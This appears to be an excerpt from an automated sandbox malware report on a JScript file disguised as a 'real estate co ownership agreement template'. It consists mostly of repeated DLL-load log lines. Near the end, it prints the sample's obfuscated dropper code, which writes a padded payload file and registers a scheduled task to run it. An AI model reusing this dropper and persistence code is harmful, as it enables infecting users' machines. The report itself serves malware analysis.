    Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samlib.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samlib.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: real estate co ownership agreement template 43632.jsStatic file information: File size 1759107 > 1048576

    Data Obfuscation

    barindex
    JScript performs obfuscated calls to suspicious functions
    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript;pSzhKh = loGuOn[P(21)](P(33));GyusB = loGuOn[P(21)](P(38));zTrbW = loGuOn[P(21)](P(40));zTrbW[P(27)]();MtQnm = zTrbW[P(12)]("\\");try{gjKLivoL = MtQnm[P(32)](baFycB);}catch(lRjvr){gjKLivoL = false;}if (gjKLivoL == false) {cpQJZO = GyusB[P(12)](pSzhKh[P(19)](P(13)))[P(18)];rDxbXI = 821-(Math[P(37)](821/cpQJZO[P(3)])*cpQJZO[P(3)]);VVJQ = 0;tjuWU = false;for(VepL = new Enumerator(cpQJZO); !VepL[P(10)](); VepL[P(22)]()) {XiTaKV = VepL[P(23)]();if (rDxbXI==VVJQ) tjuWU = XiTaKV;VVJQ++;}if (tjuWU != false) {AjxBDA = tjuWU+"\\"+CFUXD;if(!GyusB[P(34)](AjxBDA)){tMfet = GyusB[P(20)](AjxBDA, 8, true);tMfet[P(0)](aQNTEFP);VVJQ=0;FFnPq=aQNTEFP.length;while(true) {tMfet[P(0)](aQNTEFP);VVJQ=VVJQ+FFnPq;if (VVJQ>47659877) break;}tMfet[P(11)]();tMfet = GyusB[P(29)](AjxBDA);tMfet[P(2)] = aMsgA;SHPrDg = tMfet[P(41)];nLQXcoW = zTrbW[P(25)](0);nLQXcoW[P(35)][P(6)] = true;nLQXcoW[P(35)][P(26)] = false;EVjSJGM = nLQXcoW[P(36)][P(7)](9);EVjSJGM["ID"] = P(28);EVjSJGM[P(14)] = pSzhKh[P(19)](P(39));eNmbDO = nLQXcoW[P(1)][P(7)](0);eNmbDO[P(31)] = P(5);eNmbDO[P(4)] = SHPrDg;eNmbDO[P(9)] = tjuWU;MtQnm[P(24)](baFycB, nLQXcoW, 6, "" , "" , 3);gjKLivoL = MtQnm[P(32)](baFycB);loGuOn[P(16)](27755);gjKLivoL[P(15)](null, 2, 0, "");}}}loGuOn[P(42)]();}ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITe
    Yara detected Html Dropper
    Source: Yara matchFile source: real estate co ownership agreement template 43632.js, type: SAMPLE

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
